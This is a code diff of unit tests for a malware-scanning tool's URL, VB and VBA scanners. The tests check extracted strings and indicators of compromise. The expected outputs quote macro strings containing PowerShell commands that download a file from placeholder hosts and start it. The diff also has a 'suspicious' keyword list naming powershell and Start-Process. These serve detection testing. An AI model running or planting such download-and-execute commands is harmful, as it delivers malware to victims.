"size": 1536, + "md5": "c3eafa2cd34f98a226e31b8ea3fea400", + "sha1": "00104b432a8e7246695843e4f2d7cf2582efa3e6", + "sha256": "86d9755b2ba9d8ffd765621f09844dd62d0b082fdc4aafa63b3b3f3ae25d9c77", + }, + ] + ), "symbols": {"exported": [], "imported": [], "libraries": [], "table": []}, } diff --git a/src/python/strelka/tests/test_scan_url.py b/src/python/strelka/tests/test_scan_url.py index ff2a2575..2d49789d 100644 --- a/src/python/strelka/tests/test_scan_url.py +++ b/src/python/strelka/tests/test_scan_url.py @@ -1,6 +1,8 @@ from pathlib import Path from unittest import TestCase, mock +from pytest_unordered import unordered + from strelka.scanners.scan_url import ScanUrl as ScanUnderTest from strelka.tests import run_test_scan @@ -14,12 +16,14 @@ def test_scan_url_text(mocker): test_scan_event = { "elapsed": mock.ANY, "flags": [], - "urls": [ - b"http://foobar.example.com", - b"ftp://barfoo.example.com", - b"example.com", - b"https://barfoo.example.com", - ], + "urls": unordered( + [ + "example.com", + "http://foobar.example.com", + "https://barfoo.example.com", + "ftp://barfoo.example.com", + ] + ), } scanner_event = run_test_scan( @@ -41,7 +45,7 @@ def test_scan_url_html(mocker): test_scan_event = { "elapsed": mock.ANY, "flags": [], - "urls": [b"https://example.com/example.js"], + "urls": ["https://example.com/example.js"], } scanner_event = run_test_scan( diff --git a/src/python/strelka/tests/test_scan_vb.py b/src/python/strelka/tests/test_scan_vb.py new file mode 100644 index 00000000..9058d857 --- /dev/null +++ b/src/python/strelka/tests/test_scan_vb.py @@ -0,0 +1,90 @@ +from pathlib import Path +from unittest import TestCase, mock + +from pytest_unordered import unordered + +from strelka.scanners.scan_vb import ScanVb as ScanUnderTest +from strelka.tests import run_test_scan + + +def test_scan_vb(mocker): + """ + Pass: Sample event matches output of scanner. + Failure: Unable to load file or sample event fails to match. 
+ """ + test_scan_event = { + "elapsed": mock.ANY, + "flags": [], + "comments": ["AutoOpen Macro"], + "functions": ["AutoOpen", "Document_Open", "Testing_Iocs"], + "names": [ + "Explicit", + "MsgBox", + "objWMIService", + "GetObject", + "objStartup", + "Get", + "objConfig", + "SpawnInstance_", + "ShowWindow", + "objProcess", + "ExecuteCmdAsync", + ], + "operators": ["="], + "strings": [ + "Hello World!", + "winmgmts:\\\\\\\\.\\\\root\\\\cimv2", + "Win32_ProcessStartup", + "winmgmts:\\\\\\\\.\\\\root\\\\cimv2:Win32_Process", + "cmd /c powershell Invoke-WebRequest -Uri https://www.test.example.com -OutFile $env:tmp\\\\test.txt\\nStart-Process -Filepath $env:tmp\\\\invoice.one", + "cmd /c powershell Invoke-WebRequest -Uri https://www.test.com/test.bat -OutFile $env:tmp\\\\test.bat\\nStart-Process -Filepath $env:tmp\\\\test.bat", + ], + "script_length_bytes": 752, + "tokens": [ + "Token.Keyword", + "Token.Name", + "Token.Text.Whitespace", + "Token.Name.Function", + "Token.Punctuation", + "Token.Comment", + "Token.Literal.String", + "Token.Operator", + "Token.Literal.Number.Integer", + ], + "urls": unordered( + [ + "tmp\\\\invoice.one", + "https://www.test.com/test.bat", + "https://www.test.example.com", + ] + ), + "iocs": unordered( + [ + { + "ioc": "www.test.example.com", + "ioc_type": "domain", + "scanner": "ScanVb", + }, + { + "ioc": "https://www.test.example.com", + "ioc_type": "url", + "scanner": "ScanVb", + }, + {"ioc": "www.test.com", "ioc_type": "domain", "scanner": "ScanVb"}, + { + "ioc": "https://www.test.com/test.bat", + "ioc_type": "url", + "scanner": "ScanVb", + }, + ] + ), + } + + scanner_event = run_test_scan( + mocker=mocker, + scan_class=ScanUnderTest, + fixture_path=Path(__file__).parent / "fixtures/test.vba", + ) + + TestCase.maxDiff = None + TestCase().assertDictEqual(test_scan_event, scanner_event) diff --git a/src/python/strelka/tests/test_scan_vba.py b/src/python/strelka/tests/test_scan_vba.py new file mode 100644 index 00000000..0a810f91 --- /dev/null +++ b/src/python/strelka/tests/test_scan_vba.py @@ -0,0 +1,59 @@ +from pathlib import Path +from unittest import TestCase, mock + +from pytest_unordered import unordered + +from strelka.scanners.scan_vba import ScanVba as ScanUnderTest +from strelka.tests import run_test_scan + + +def test_scan_vba(mocker): + """ + Pass: Sample event matches output of scanner. + Failure: Unable to load file or sample event fails to match. + """ + test_scan_event = { + "elapsed": mock.ANY, + "flags": [], + "auto_exec": ["AutoOpen", "Document_Open"], + "base64": [], + "dridex": [], + "hex": [], + "ioc": [ + "https://www.test.example.com", + "https://www.test.com/test.bat", + "test.bat", + ], + "iocs": unordered( + [ + {"ioc": "test.bat", "ioc_type": "domain", "scanner": "ScanVba"}, + { + "ioc": "www.test.example.com", + "ioc_type": "domain", + "scanner": "ScanVba", + }, + { + "ioc": "https://www.test.example.com", + "ioc_type": "url", + "scanner": "ScanVba", + }, + {"ioc": "www.test.com", "ioc_type": "domain", "scanner": "ScanVba"}, + { + "ioc": "https://www.test.com/test.bat", + "ioc_type": "url", + "scanner": "ScanVba", + }, + ] + ), + "suspicious": ["powershell", "Start-Process", "ShowWindow", "GetObject"], + "total": {"extracted": 1, "files": 1}, + } + + scanner_event = run_test_scan( + mocker=mocker, + scan_class=ScanUnderTest, + fixture_path=Path(__file__).parent / "fixtures/test.vba", + ) + + TestCase.maxDiff = None + TestCase().assertDictEqual(test_scan_event, scanner_event)